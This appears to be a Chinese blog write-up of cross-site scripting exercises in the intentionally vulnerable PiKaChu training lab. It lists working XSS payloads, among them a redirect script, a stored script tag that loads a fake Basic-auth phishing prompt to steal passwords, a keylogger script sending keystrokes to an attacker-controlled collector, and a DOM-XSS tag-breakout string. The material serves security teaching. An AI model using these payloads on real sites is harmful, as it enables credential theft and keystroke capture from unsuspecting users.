[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(中)

简介: [PiKaChu靶场通关]Cross-Site Scripting XSS漏洞

漏洞利用

1、注入跳转网页

payload

<script>document.location='https://www.csdn.com/'</script>

跳转成功:

1.png

2、网站钓鱼

在靶场的pkxss目录下, 有一个xfish目录, 里面是相关的钓鱼脚本:

image.png

钓鱼脚本使用的是 Basic认证 ,


我们在这个页面上嵌入一个恶意请求,当用户打开这个页面时, 就会向攻击者的服务器发送请求,这个请求会返回一个Basic认证的头部: 会弹出一个提示框,要求受害者输入账号密码,从而盗取用户的账号密码。(比较明显的攻击方式)


首先攻击者需要构造一个钓鱼页面,用来将发送Basic认证的认证框,


这里用的是靶场目录下的: pkxss/xfish/fish.php:

image.png

然后将攻击恶意代码嵌入留言板中:

<script src='http://127.0.0.1/pikachu/pkxss/xfish/fish.php'>alert('拈花倾城')</script>

image.png

当受害者输入自己的密码就会被钓鱼, 钓鱼信息存储在攻击者服务器上, 这里的地址为:

http://127.0.0.1/pikachu/pkxss/xfish/pkxss_fish_result.php

可以看到刚刚被钓鱼的用户信息:

image.png

3、获取键盘记录

攻击js脚本位于网站目录下的 pkxss/rkeypress/rk.js :

1.png

其中, 127.0.0.1是攻击者的地址

上面脚本获取了用户的键盘记录后, 再重定向到 rkserver.php:

image.png

payload:

<script src='http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js'></script>

访问xss键盘记录后台:

http://127.0.0.1/pikachu/pkxss/rkeypress/pkxss_keypress_result.php

image.png

四、DOM型XSS

DOM可以理解为访问HTML的标准接口,DOM里面会把我们的HTML分成一个DOM树:

image.png

观察一下这个题目,当我们输入任何数据都会转换为一个网页:

image.png

在网页源代码也可以看到, 点击click之后生成了标签:

image.png

漏洞利用

1、利用JavaScript伪协议

javascript:alert("拈花倾城!!")

image.png

2、绕过、闭合

我们先试着插入:

<script>alter('拈花倾城')</script>

image.png

F12看看如何闭合:所以我们首先要闭合href然后补齐后面的标签< /a>,同时要在我们的语句最后加上注释

image.png

我们的payload如下:

1"></a><script>alter('拈花倾城')</script>#


相关文章
|
2月前
|
安全 网络安全 数据安全/隐私保护
XSS 漏洞可能会带来哪些危害?
【10月更文挑战第26天】XSS漏洞可能会给网站和用户带来诸多严重危害
|
2月前
|
存储 监控 安全
|
4月前
|
安全 JavaScript 前端开发
XSS漏洞的危害
XSS漏洞的危害
80 1
|
2月前
|
存储 JSON 安全
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
|
3月前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
3月前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
3月前
|
开发框架 安全 JavaScript
xss漏洞原理(四)自动化XSS
xss漏洞原理(四)自动化XSS
|
3月前
|
存储 Web App开发 安全
XSS漏洞原理(三)存储型
XSS漏洞原理(三)存储型
|
3月前
|
安全 Apache PHP
XSS漏洞理由(二)反射型
XSS漏洞理由(二)反射型
|
3月前
|
存储 安全 JavaScript
xss漏洞简介
xss漏洞简介